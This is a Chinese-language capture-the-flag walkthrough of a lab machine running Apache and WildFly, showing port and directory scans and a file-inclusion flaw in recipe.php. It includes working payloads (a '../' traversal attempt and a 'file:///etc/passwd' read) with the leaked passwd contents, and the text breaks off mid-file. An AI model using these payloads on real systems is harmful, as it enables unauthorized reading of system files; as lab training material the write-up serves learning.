![\"image-20240329114226342\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403291536853.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u626b\u63cf\u5f00\u653e\u7aef\u53e3<\/h3>\nrustscan -a 10.0.2.14 -- -A -sC -sV<\/code><\/pre>\nOpen 10.0.2.14:22\nOpen 10.0.2.14:80\nOpen 10.0.2.14:8080\nOpen 10.0.2.14:8443\nOpen 10.0.2.14:9990<\/code><\/pre>\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n| 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n80\/tcp open http syn-ack Apache httpd 2.4.57 ((Debian))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-title: burger html5 landing page\n8080\/tcp open http-proxy syn-ack\n| fingerprint-strings: \n| FourOhFourRequest: \n| HTTP\/1.1 404 Not Found\n| Connection: close\n| Content-Length: 74\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:16 GMT\n| <html><head><title>Error<\/title><\/head><body>404 - Not Found<\/body><\/html>\n| GetRequest: \n| HTTP\/1.1 200 OK\n| Connection: close\n| Last-Modified: Wed, 18 Oct 2023 06:43:38 GMT\n| Content-Length: 1590\n| Content-Type: text\/html\n| Accept-Ranges: bytes\n| Date: Fri, 29 Mar 2024 03:43:16 GMT\n| <!--\n| Copyright The WildFly Authors\n| SPDX-License-Identifier: Apache-2.0\n| <!DOCTYPE html>\n| <html>\n| <head>\n| <!-- proper charset -->\n| <meta http-equiv="content-type" content="text\/html;charset=utf-8" \/>\n| <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" \/>\n| <title>Welcome to WildFly<\/title>\n| <link rel="shortcut icon" href="favicon.ico" type="image\/x-icon">\n| <link rel="StyleSheet" href="wildfly.css" type="text\/css">\n| <\/head>\n| <body>\n| <div class="wrapper">\n| <div class="content">\n| <div class="logo">\n| <img src="wildfly_logo.png" alt="WildFly" border="0" \/>\n| <\/div>\n| <h1>Welcome to WildFly<\/h1>\n| <h3>Your WildFly instance is ru\n| HTTPOptions: \n| HTTP\/1.1 405 Method Not Allowed\n| Allow: GET, HEAD, POST\n| Connection: close\n| Content-Length: 83\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:16 GMT\n| <html><head><title>Error<\/title><\/head><body>405 - Method Not Allowed<\/body><\/html>\n| RTSPRequest: \n| HTTP\/1.1 400 Bad Request\n| Content-Length: 0\n|_ Connection: close\n|_http-favicon: Unknown favicon MD5: D9C04E84269281A37E8F024578FFD4F3\n|_http-title: Welcome to WildFly\n|_http-open-proxy: Proxy might be redirecting requests\n| http-methods: \n|_ Supported Methods: GET HEAD POST\n8443\/tcp open ssl\/https-alt syn-ack\n| tls-alpn: \n|_ http\/1.1\n|_ssl-date: TLS randomness does not represent time\n| http-methods: \n|_ Supported Methods: GET HEAD POST\n| fingerprint-strings: \n| FourOhFourRequest: \n| HTTP\/1.1 404 Not Found\n| Connection: close\n| Content-Length: 74\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:23 GMT\n| <html><head><title>Error<\/title><\/head><body>404 - Not Found<\/body><\/html>\n| GetRequest: \n| HTTP\/1.1 200 OK\n| Connection: close\n| Last-Modified: Wed, 18 Oct 2023 06:43:38 GMT\n| Content-Length: 1590\n| Content-Type: text\/html\n| Accept-Ranges: bytes\n| Date: Fri, 29 Mar 2024 03:43:23 GMT\n| <!--\n| Copyright The WildFly Authors\n| SPDX-License-Identifier: Apache-2.0\n| <!DOCTYPE html>\n| <html>\n| <head>\n| <!-- proper charset -->\n| <meta http-equiv="content-type" content="text\/html;charset=utf-8" \/>\n| <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" \/>\n| <title>Welcome to WildFly<\/title>\n| <link rel="shortcut icon" href="favicon.ico" type="image\/x-icon">\n| <link rel="StyleSheet" href="wildfly.css" type="text\/css">\n| <\/head>\n| <body>\n| <div class="wrapper">\n| <div class="content">\n| <div class="logo">\n| <img src="wildfly_logo.png" alt="WildFly" border="0" \/>\n| <\/div>\n| <h1>Welcome to WildFly<\/h1>\n| <h3>Your WildFly instance is ru\n| HTTPOptions: \n| HTTP\/1.1 405 Method Not Allowed\n| Allow: GET, HEAD, POST\n| Connection: close\n| Content-Length: 83\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:23 GMT\n|_ <html><head><title>Error<\/title><\/head><body>405 - Method Not Allowed<\/body><\/html>\n|_http-favicon: Unknown favicon MD5: D9C04E84269281A37E8F024578FFD4F3\n|_http-title: Welcome to WildFly\n| ssl-cert: Subject: commonName=localhost\n| Issuer: commonName=localhost\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2024-03-29T03:43:16\n| Not valid after: 2034-03-27T03:43:16\n| MD5: 896e:3042:e13c:a048:4a99:6339:e7d0:9feb\n| SHA-1: 3740:baf7:37e4:30b2:4038:4393:e4d9:8569:15e5:1068\n| -----BEGIN CERTIFICATE-----\n| MIICyzCCAbWgAwIBAgIIFjRGS+M00V0wCwYJKoZIhvcNAQELMBQxEjAQBgNVBAMT\n| CWxvY2FsaG9zdDAiGA8yMDI0MDMyOTAzNDMxNloYDzIwMzQwMzI3MDM0MzE2WjAU\n| MRIwEAYDVQQDEwlsb2NhbGhvc3QwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK\n| AoIBAQCsITFeuqOZtIUa4TDf8RABcgCs87lJzejiTASjLZ6Z7CO\/rAdDKWKQFOxF\n| LU+YHemRsul+LhpgzojAhBuLbfxKZS+TWzVjekTQhDpaCISMgkLh5ZmAyNdFDRdH\n| +SRXrOn2IvqWiKpzdVV5yrgpvByoQqsbMyW0SpERwfh2v2hHD25Waql6qz++I7EE\n| H\/ovgIxL36eShHDWBxrXIPZ2HWL0W91GwMhvV53jah25JvpVUYjs1Dx91Ar0otyy\n| fnb1Di4Ytm+UUWa3e6+xoSgf7FSjCwmzL+Mjs9Sl6uXEuJc7BGauREei+J\/yxvI1\n| r19GTzClUI7kefM5uAkuIFGgWznjAgMBAAGjITAfMB0GA1UdDgQWBBS1Sixbvsns\n| ozYrPxef7VwSTs3W6zALBgkqhkiG9w0BAQsDggEBAGW2B+T16gj+L1muXhpIHzR3\n| f6HO7QAheFk6\/zGHkLBiUyhp0XWnwnQ5\/3z0xGABt0Jt6j8dnghIML25WgRtU+3W\n| wIju0O2Sq+GnasY77ayFX9nCMAjPzu4I1mSi6ax\/qfA8raJBpsyb1q9QVnz9aj24\n| 29P80jUvcSCo0E6gue38OTKDQLvmsx+kxTIuDjK9EWKjrSiO7QgXGHMGTyEYasjK\n| Fk2koAu4KdvH48I72jmdGvGmM5k1V+qk0s+wuIijAo2dsnoEKX3HZpCeeZeNRs5g\n| NHt7jJHoS2HnU3OU0wAgEERpCYVLEq59FzxKf2C+J9IDf0R+2MUjHMxWGTJH\/1I=\n|_-----END CERTIFICATE-----\n9990\/tcp open osm-appsrvr? syn-ack\n| fingerprint-strings: \n| FourOhFourRequest: \n| HTTP\/1.1 404 Not Found\n| Connection: close\n| Content-Length: 74\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:36 GMT\n| <html><head><title>Error<\/title><\/head><body>404 - Not Found<\/body><\/html>\n| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, WMSRequest: \n| HTTP\/1.1 400 Bad Request\n| Content-Length: 0\n| Connection: close\n| GetRequest: \n| HTTP\/1.1 302 Found\n| Connection: close\n| Location: \/console\/index.html\n| Content-Length: 0\n| Date: Fri, 29 Mar 2024 03:43:16 GMT\n| HTTPOptions: \n| HTTP\/1.1 405 Method Not Allowed\n| Connection: close\n| Content-Length: 83\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:16 GMT\n|_ <html><head><title>Error<\/title><\/head><body>405 - Method Not Allowed<\/body><\/html>\n3 services unrecognized despite returning data. If you know the service\/version, please submit the following fingerprints at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\n==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============\nSF-Port8080-TCP:V=7.94SVN%I=7%D=3\/28%Time=660638D2%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,6F4,"HTTP\/1\\.1\\x20200\\x20OK\\r\\nConnection:\\x20close\\r\\nLast\nSF:-Modified:\\x20Wed,\\x2018\\x20Oct\\x202023\\x2006:43:38\\x20GMT\\r\\nContent-L\nSF:ength:\\x201590\\r\\nContent-Type:\\x20text\/html\\r\\nAccept-Ranges:\\x20bytes\nSF:\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003:43:16\\x20GMT\\r\\n\\r\\n<!--\\n\nSF:\\x20\\x20~\\x20Copyright\\x20The\\x20WildFly\\x20Authors\\n\\x20\\x20~\\x20SPDX-\nSF:License-Identifier:\\x20Apache-2\\.0\\n\\x20\\x20-->\\n\\n<!DOCTYPE\\x20html>\\n\nSF:\\n<html>\\n<head>\\n\\x20\\x20\\x20\\x20<!--\\x20proper\\x20charset\\x20-->\\n\\x2\nSF:0\\x20\\x20\\x20<meta\\x20http-equiv=\\"content-type\\"\\x20content=\\"text\/htm\nSF:l;charset=utf-8\\"\\x20\/>\\n\\x20\\x20\\x20\\x20<meta\\x20http-equiv=\\"X-UA-Com\nSF:patible\\"\\x20content=\\"IE=EmulateIE8\\"\\x20\/>\\n\\n\\x20\\x20\\x20\\x20<title>\nSF:Welcome\\x20to\\x20WildFly<\/title>\\n\\x20\\x20\\x20\\x20<link\\x20rel=\\"shortc\nSF:ut\\x20icon\\"\\x20href=\\"favicon\\.ico\\"\\x20type=\\"image\/x-icon\\">\\n\\x20\\x\nSF:20\\x20\\x20<link\\x20rel=\\"StyleSheet\\"\\x20href=\\"wildfly\\.css\\"\\x20type=\nSF:\\"text\/css\\">\\n<\/head>\\n\\n<body>\\n<div\\x20class=\\"wrapper\\">\\n\\x20\\x20\\\nSF:x20\\x20<div\\x20class=\\"content\\">\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<div\nSF:\\x20class=\\"logo\\">\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20\\x20\\x20<img\\x20src=\\"wildfly_logo\\.png\\"\\x20alt=\\"WildFly\\"\\x20b\nSF:order=\\"0\\"\\x20\/>\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<\/div>\\n\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20<h1>Welcome\\x20to\\x20WildFly<\/h1>\\n\\n\\x20\\x20\\x20\\x\nSF:20\\x20\\x20\\x20\\x20<h3>Your\\x20WildFly\\x20instance\\x20is\\x20ru")%r(HTTPO\nSF:ptions,F3,"HTTP\/1\\.1\\x20405\\x20Method\\x20Not\\x20Allowed\\r\\nAllow:\\x20GE\nSF:T,\\x20HEAD,\\x20POST\\r\\nConnection:\\x20close\\r\\nContent-Length:\\x2083\\r\\\nSF:nContent-Type:\\x20text\/html\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003\nSF::43:16\\x20GMT\\r\\n\\r\\n<html><head><title>Error<\/title><\/head><body>405\\x\nSF:20-\\x20Method\\x20Not\\x20Allowed<\/body><\/html>")%r(RTSPRequest,42,"HTTP\/\nSF:1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\x2\nSF:0close\\r\\n\\r\\n")%r(FourOhFourRequest,C9,"HTTP\/1\\.1\\x20404\\x20Not\\x20Fou\nSF:nd\\r\\nConnection:\\x20close\\r\\nContent-Length:\\x2074\\r\\nContent-Type:\\x2\nSF:0text\/html\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003:43:16\\x20GMT\\r\\n\nSF:\\r\\n<html><head><title>Error<\/title><\/head><body>404\\x20-\\x20Not\\x20Fou\nSF:nd<\/body><\/html>");\n==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============\nSF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=3\/28%Time=660638D8%P=x86_64-pc-linux\nSF:-gnu%r(GetRequest,6F4,"HTTP\/1\\.1\\x20200\\x20OK\\r\\nConnection:\\x20close\\r\nSF:\\nLast-Modified:\\x20Wed,\\x2018\\x20Oct\\x202023\\x2006:43:38\\x20GMT\\r\\nCon\nSF:tent-Length:\\x201590\\r\\nContent-Type:\\x20text\/html\\r\\nAccept-Ranges:\\x2\nSF:0bytes\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003:43:23\\x20GMT\\r\\n\\r\\n\nSF:<!--\\n\\x20\\x20~\\x20Copyright\\x20The\\x20WildFly\\x20Authors\\n\\x20\\x20~\\x2\nSF:0SPDX-License-Identifier:\\x20Apache-2\\.0\\n\\x20\\x20-->\\n\\n<!DOCTYPE\\x20h\nSF:tml>\\n\\n<html>\\n<head>\\n\\x20\\x20\\x20\\x20<!--\\x20proper\\x20charset\\x20--\nSF:>\\n\\x20\\x20\\x20\\x20<meta\\x20http-equiv=\\"content-type\\"\\x20content=\\"te\nSF:xt\/html;charset=utf-8\\"\\x20\/>\\n\\x20\\x20\\x20\\x20<meta\\x20http-equiv=\\"X-\nSF:UA-Compatible\\"\\x20content=\\"IE=EmulateIE8\\"\\x20\/>\\n\\n\\x20\\x20\\x20\\x20<\nSF:title>Welcome\\x20to\\x20WildFly<\/title>\\n\\x20\\x20\\x20\\x20<link\\x20rel=\\"\nSF:shortcut\\x20icon\\"\\x20href=\\"favicon\\.ico\\"\\x20type=\\"image\/x-icon\\">\\n\nSF:\\x20\\x20\\x20\\x20<link\\x20rel=\\"StyleSheet\\"\\x20href=\\"wildfly\\.css\\"\\x2\nSF:0type=\\"text\/css\\">\\n<\/head>\\n\\n<body>\\n<div\\x20class=\\"wrapper\\">\\n\\x2\nSF:0\\x20\\x20\\x20<div\\x20class=\\"content\\">\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20<div\\x20class=\\"logo\\">\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20<img\\x20src=\\"wildfly_logo\\.png\\"\\x20alt=\\"WildFly\\\nSF:"\\x20border=\\"0\\"\\x20\/>\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<\/div>\\n\\x20\\x\nSF:20\\x20\\x20\\x20\\x20\\x20\\x20<h1>Welcome\\x20to\\x20WildFly<\/h1>\\n\\n\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20<h3>Your\\x20WildFly\\x20instance\\x20is\\x20ru")%r\nSF:(HTTPOptions,F3,"HTTP\/1\\.1\\x20405\\x20Method\\x20Not\\x20Allowed\\r\\nAllow:\nSF:\\x20GET,\\x20HEAD,\\x20POST\\r\\nConnection:\\x20close\\r\\nContent-Length:\\x2\nSF:083\\r\\nContent-Type:\\x20text\/html\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\nSF:\\x2003:43:23\\x20GMT\\r\\n\\r\\n<html><head><title>Error<\/title><\/head><body\nSF:>405\\x20-\\x20Method\\x20Not\\x20Allowed<\/body><\/html>")%r(FourOhFourReque\nSF:st,C9,"HTTP\/1\\.1\\x20404\\x20Not\\x20Found\\r\\nConnection:\\x20close\\r\\nCont\nSF:ent-Length:\\x2074\\r\\nContent-Type:\\x20text\/html\\r\\nDate:\\x20Fri,\\x2029\\\nSF:x20Mar\\x202024\\x2003:43:23\\x20GMT\\r\\n\\r\\n<html><head><title>Error<\/titl\nSF:e><\/head><body>404\\x20-\\x20Not\\x20Found<\/body><\/html>");\n==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============\nSF-Port9990-TCP:V=7.94SVN%I=7%D=3\/28%Time=660638D2%P=x86_64-pc-linux-gnu%r\nSF:(GenericLines,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\nSF:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(GetRequest,80,"HTTP\/1\\.1\\x203\nSF:02\\x20Found\\r\\nConnection:\\x20close\\r\\nLocation:\\x20\/console\/index\\.htm\nSF:l\\r\\nContent-Length:\\x200\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003:4\nSF:3:16\\x20GMT\\r\\n\\r\\n")%r(HTTPOptions,DB,"HTTP\/1\\.1\\x20405\\x20Method\\x20N\nSF:ot\\x20Allowed\\r\\nConnection:\\x20close\\r\\nContent-Length:\\x2083\\r\\nConte\nSF:nt-Type:\\x20text\/html\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003:43:16\nSF:\\x20GMT\\r\\n\\r\\n<html><head><title>Error<\/title><\/head><body>405\\x20-\\x2\nSF:0Method\\x20Not\\x20Allowed<\/body><\/html>")%r(RTSPRequest,42,"HTTP\/1\\.1\\x\nSF:20400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\nSF:\\r\\n\\r\\n")%r(Help,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Len\nSF:gth:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(SSLSessionReq,42,"HTTP\/1\\\nSF:.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20c\nSF:lose\\r\\n\\r\\n")%r(TerminalServerCookie,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Re\nSF:quest\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(TLSSe\nSF:ssionReq,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\nSF:\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(Kerberos,42,"HTTP\/1\\.1\\x20400\\x20B\nSF:ad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")\nSF:%r(SMBProgNeg,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\nSF:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(FourOhFourRequest,C9,"HTTP\/1\\\nSF:.1\\x20404\\x20Not\\x20Found\\r\\nConnection:\\x20close\\r\\nContent-Length:\\x2\nSF:074\\r\\nContent-Type:\\x20text\/html\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\nSF:\\x2003:43:36\\x20GMT\\r\\n\\r\\n<html><head><title>Error<\/title><\/head><body\nSF:>404\\x20-\\x20Not\\x20Found<\/body><\/html>")%r(LPDString,42,"HTTP\/1\\.1\\x20\nSF:400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\nSF:\\n\\r\\n")%r(LDAPSearchReq,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCont\nSF:ent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(SIPOptions,42,"HTT\nSF:P\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\\nSF:x20close\\r\\n\\r\\n")%r(WMSRequest,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\\nSF:r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n");\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u5b9e\u5730\u52d8\u63a2<\/h3>\n
\u5f00\u653e\u4e8680<\/code>\u548c8080<\/code>\uff0c\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n![\"image-20240329115037536\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u8fd8\u7981\u6b62\u53f3\u952e\uff0c\u5c1d\u8bd5\u4e00\u4e0bctrl+U<\/code>\uff0c\u53ef\u4ee5\u770b\u5230\u6e90\u4ee3\u7801\u4e86\uff0c\u4f46\u662f\u6ca1\u5565\u4e1c\u897f\u3002<\/p>\n\u63d2\u4ef6\u53d1\u73b0\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u518d\u770b8080<\/code>\u7aef\u53e3\uff1a<\/p>\n<\/div><\/p>\n\u63d2\u4ef6\u663e\u793a\u5176\u4fe1\u606f\u662f\uff1a<\/p>\n
<\/div><\/p>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nferoxbuster -u http:\/\/10.0.2.14 | awk '{print $1, $6}' <\/code><\/pre>\n301 http:\/\/10.0.2.14\/images\n200 http:\/\/10.0.2.14\/images\/logo.png\n200 http:\/\/10.0.2.14\/images\/chicken.png\n200 http:\/\/10.0.2.14\/images\/menu_bg.jpg\n200 http:\/\/10.0.2.14\/images\/footer_logo.png\n200 http:\/\/10.0.2.14\/images\/stamp.png\n200 http:\/\/10.0.2.14\/css\/bootsnav.css\n200 http:\/\/10.0.2.14\/css\/flaticon.css\n200 http:\/\/10.0.2.14\/css\/custom.css\n200 http:\/\/10.0.2.14\/js\/bootsnav.js\n200 http:\/\/10.0.2.14\/images\/feature_bg.jpg\n200 http:\/\/10.0.2.14\/images\/drinks_bg.jpg\n200 http:\/\/10.0.2.14\/images\/small_slider_bg.jpg\n200 http:\/\/10.0.2.14\/images\/classic_bg.jpg\n200 http:\/\/10.0.2.14\/images\/large_slider_img.jpg\n301 http:\/\/10.0.2.14\/fonts\n200 http:\/\/10.0.2.14\/fonts\/Flaticon.woff\n200 http:\/\/10.0.2.14\/fonts\/Flaticon.svg\n200 http:\/\/10.0.2.14\/fonts\/Flaticon.ttf\n200 http:\/\/10.0.2.14\/fonts\/Flaticon.eot\n301 http:\/\/10.0.2.14\/js\n200 http:\/\/10.0.2.14\/js\/main.js\n301 http:\/\/10.0.2.14\/css\n200 http:\/\/10.0.2.14\/css\/animate.css\n200 http:\/\/10.0.2.14\/css\/color.css\n200 http:\/\/10.0.2.14\/images\/sign_bg.jpg\n200 http:\/\/10.0.2.14\/images\/lock_bg.jpg\n200 http:\/\/10.0.2.14\/images\/sides_bg.jpg\n200 http:\/\/10.0.2.14\/images\/header_bg.jpg\n200 http:\/\/10.0.2.14\/js\/gmaps.min.js\n200 http:\/\/10.0.2.14\/recipe.php\n200 http:\/\/10.0.2.14\/<\/code><\/pre>\n\u4ee5\u9632\u4e07\u4e00\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n
sudo dirsearch -u http:\/\/10.0.2.14 -e* -i 200,299-399 2>\/dev\/null<\/code><\/pre>\n[23:58:03] 301 - 303B - \/js -> http:\/\/10.0.2.14\/js\/\n[23:58:07] 301 - 309B - \/__MACOSX -> http:\/\/10.0.2.14\/__MACOSX\/\n[23:58:08] 200 - 3B - \/about.php\n[23:58:25] 301 - 304B - \/css -> http:\/\/10.0.2.14\/css\/\n[23:58:30] 301 - 306B - \/fonts -> http:\/\/10.0.2.14\/fonts\/\n[23:58:33] 200 - 653B - \/images\/\n[23:58:33] 301 - 307B - \/images -> http:\/\/10.0.2.14\/images\/\n[23:58:36] 200 - 485B - \/js\/<\/code><\/pre>\n\u518d\u626b\u63cf\u4e00\u4e0b8080<\/code>\u7aef\u53e3\uff1a<\/p>\nferoxbuster -u http:\/\/10.0.2.14:8080 | awk '{print $1, $6}' <\/code><\/pre>\n200 http:\/\/10.0.2.14:8080\/wildfly.css\n200 http:\/\/10.0.2.14:8080\/favicon.ico\n200 http:\/\/10.0.2.14:8080\/jbosscommunity_logo_hori_white.png\n302 http:\/\/10.0.2.14:8080\/console\n200 http:\/\/10.0.2.14:8080\/wildfly_logo.png\n200 http:\/\/10.0.2.14:8080\/<\/code><\/pre>\nsudo dirsearch -u http:\/\/10.0.2.14:8080 -e* -i 200,299-399 2>\/dev\/null<\/code><\/pre>\n[00:01:13] 302 - 0B - \/console\/ -> http:\/\/10.0.2.14:9990\/console\n[00:01:13] 302 - 0B - \/console\/j_security_check -> http:\/\/10.0.2.14:9990\/console\n[00:01:13] 302 - 0B - \/console\/login\/LoginForm.jsp -> http:\/\/10.0.2.14:9990\/console\n[00:01:13] 302 - 0B - \/console -> http:\/\/10.0.2.14:9990\/console\n[00:01:13] 302 - 0B - \/console\/payments\/config.json -> http:\/\/10.0.2.14:9990\/console\n[00:01:13] 302 - 0B - \/console\/base\/config.json -> http:\/\/10.0.2.14:9990\/console\n[00:01:18] 200 - 1KB - \/favicon.ico<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/10.0.2.14\/recipe.php\n# lol\nhttp:\/\/10.0.2.14\/about.php\n# lol\nhttp:\/\/10.0.2.14:8080\/console<\/code><\/pre>\n<\/div><\/p>\n\u795e\u9b54\u60c5\u51b5<\/h3>\n
80\u7aef\u53e3\u4e00\u76f4\u52a0\u8f7d\u4e0d\u51fa\u6765\u4ec0\u4e48\u4e1c\u897f\uff0c\u8981\u88c2\u5f00\u4e86\uff0c\u9b3c\u4f7f\u795e\u5dee\u7684\u60f3\u6362\u5230vmware\u4e0a\u8bd5\u8bd5\uff0c\u7ed3\u679c\u4e0d\u51fa\u610f\u6599\u5931\u8d25\u4e86\uff0c\u6de6\uff0c\u5012\u662f\u5728virtualbox\u6539\u4e3a\u6865\u63a5\u4ee5\u540e\uff0c\u5c1d\u8bd5\u53ef\u4ee5\u6253\u5f00\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u6539\u4e3a\/recipe.php<\/code>\uff0c\u53d1\u73b0\u4e86\u7279\u6b8a\u754c\u9762\uff1a<\/p>\n<\/div><\/p>\n\u6587\u4ef6\u5305\u542b<\/h3>\n
\u53d1\u73b0\u94fe\u63a5\u53ef\u80fd\u5b58\u5728\u6587\u4ef6\u5305\u542b\u7684\u6f0f\u6d1e\uff1a<\/p>\n
http:\/\/10.161.16.19\/recipe.php?file=fatty-burger.php<\/code><\/pre>\n\u5c1d\u8bd5\u76ee\u5f55\u7a7f\u8d8a\uff1a<\/p>\n
http:\/\/10.161.16.19\/recipe.php?file=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n\u4f46\u662f\u5931\u8d25\u4e86\uff1a<\/p>\n
Access denied !<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528file\u534f\u8bae\u8bfb\u53d6\uff1a<\/p>\n
http:\/\/10.161.16.19\/recipe.php?file=file:\/\/\/etc\/passwd<\/code><\/pre>\nroot:x:0:0:root:\/root:\/usr\/bin\/zsh\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip 